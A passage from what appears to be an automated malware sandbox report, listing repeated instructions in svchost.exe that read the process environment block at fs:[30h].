            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]2_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B930B mov eax, dword ptr fs:[00000030h]2_2_038B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B930B mov eax, dword ptr fs:[00000030h]2_2_038B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B930B mov eax, dword ptr fs:[00000030h]2_2_038B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]2_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]2_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F132D mov eax, dword ptr fs:[00000030h]2_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F132D mov eax, dword ptr fs:[00000030h]2_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385F32A mov eax, dword ptr fs:[00000030h]2_2_0385F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03827330 mov eax, dword ptr fs:[00000030h]2_2_03827330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D34C mov eax, dword ptr fs:[00000030h]2_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D34C mov eax, dword ptr fs:[00000030h]2_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03905341 mov eax, dword ptr fs:[00000030h]2_2_03905341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829353 mov eax, dword ptr fs:[00000030h]2_2_03829353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829353 mov eax, dword ptr fs:[00000030h]2_2_03829353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]2_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF367 mov eax, dword ptr fs:[00000030h]2_2_038EF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]2_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03837370 mov eax, dword ptr fs:[00000030h]2_2_03837370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03837370 mov eax, dword ptr fs:[00000030h]2_2_03837370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03837370 mov eax, dword ptr fs:[00000030h]2_2_03837370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03905283 mov eax, dword ptr fs:[00000030h]2_2_03905283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386329E mov eax, dword ptr fs:[00000030h]2_2_0386329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386329E mov eax, dword ptr fs:[00000030h]2_2_0386329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A0 mov eax, dword ptr fs:[00000030h]2_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A0 mov eax, dword ptr fs:[00000030h]2_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A0 mov eax, dword ptr fs:[00000030h]2_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A0 mov eax, dword ptr fs:[00000030h]2_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F92A6 mov eax, dword ptr fs:[00000030h]2_2_038F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F92A6 mov eax, dword ptr fs:[00000030h]2_2_038F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F92A6 mov eax, dword ptr fs:[00000030h]2_2_038F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F92A6 mov eax, dword ptr fs:[00000030h]2_2_038F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C72A0 mov eax, dword ptr fs:[00000030h]2_2_038C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C72A0 mov eax, dword ptr fs:[00000030h]2_2_038C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B92BC mov eax, dword ptr fs:[00000030h]2_2_038B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B92BC mov eax, dword ptr fs:[00000030h]2_2_038B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B92BC mov ecx, dword ptr fs:[00000030h]2_2_038B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B92BC mov ecx, dword ptr fs:[00000030h]2_2_038B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C0 mov eax, dword ptr fs:[00000030h]2_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038392C5 mov eax, dword ptr fs:[00000030h]2_2_038392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038392C5 mov eax, dword ptr fs:[00000030h]2_2_038392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B2D3 mov eax, dword ptr fs:[00000030h]2_2_0382B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B2D3 mov eax, dword ptr fs:[00000030h]2_2_0382B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B2D3 mov eax, dword ptr fs:[00000030h]2_2_0382B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385F2D0 mov eax, dword ptr fs:[00000030h]2_2_0385F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385F2D0 mov eax, dword ptr fs:[00000030h]2_2_0385F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039052E2 mov eax, dword ptr fs:[00000030h]2_2_039052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF2F8 mov eax, dword ptr fs:[00000030h]2_2_038EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038292FF mov eax, dword ptr fs:[00000030h]2_2_038292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03867208 mov eax, dword ptr fs:[00000030h]2_2_03867208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03867208 mov eax, dword ptr fs:[00000030h]2_2_03867208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03905227 mov eax, dword ptr fs:[00000030h]2_2_03905227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]2_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829240 mov eax, dword ptr fs:[00000030h]2_2_03829240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829240 mov eax, dword ptr fs:[00000030h]2_2_03829240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386724D mov eax, dword ptr fs:[00000030h]2_2_0386724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]2_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EB256 mov eax, dword ptr fs:[00000030h]2_2_038EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EB256 mov eax, dword ptr fs:[00000030h]2_2_038EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]2_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FD26B mov eax, dword ptr fs:[00000030h]2_2_038FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FD26B mov eax, dword ptr fs:[00000030h]2_2_038FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]2_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03859274 mov eax, dword ptr fs:[00000030h]2_2_03859274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03871270 mov eax, dword ptr fs:[00000030h]2_2_03871270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03871270 mov eax, dword ptr fs:[00000030h]2_2_03871270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]2_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03887190 mov eax, dword ptr fs:[00000030h]2_2_03887190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E11A4 mov eax, dword ptr fs:[00000030h]2_2_038E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E11A4 mov eax, dword ptr fs:[00000030h]2_2_038E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E11A4 mov eax, dword ptr fs:[00000030h]2_2_038E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E11A4 mov eax, dword ptr fs:[00000030h]2_2_038E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384B1B0 mov eax, dword ptr fs:[00000030h]2_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386D1D0 mov eax, dword ptr fs:[00000030h]2_2_0386D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386D1D0 mov ecx, dword ptr fs:[00000030h]2_2_0386D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039051CB mov eax, dword ptr fs:[00000030h]2_2_039051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038351ED mov eax, dword ptr fs:[00000030h]2_2_038351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]2_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]2_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]2_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]2_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03831131 mov eax, dword ptr fs:[00000030h]2_2_03831131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03831131 mov eax, dword ptr fs:[00000030h]2_2_03831131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B136 mov eax, dword ptr fs:[00000030h]2_2_0382B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B136 mov eax, dword ptr fs:[00000030h]2_2_0382B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B136 mov eax, dword ptr fs:[00000030h]2_2_0382B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B136 mov eax, dword ptr fs:[00000030h]2_2_0382B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03905152 mov eax, dword ptr fs:[00000030h]2_2_03905152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829148 mov eax, dword ptr fs:[00000030h]2_2_03829148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829148 mov eax, dword ptr fs:[00000030h]2_2_03829148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829148 mov eax, dword ptr fs:[00000030h]2_2_03829148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829148 mov eax, dword ptr fs:[00000030h]2_2_03829148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03837152 mov eax, dword ptr fs:[00000030h]2_2_03837152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]2_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
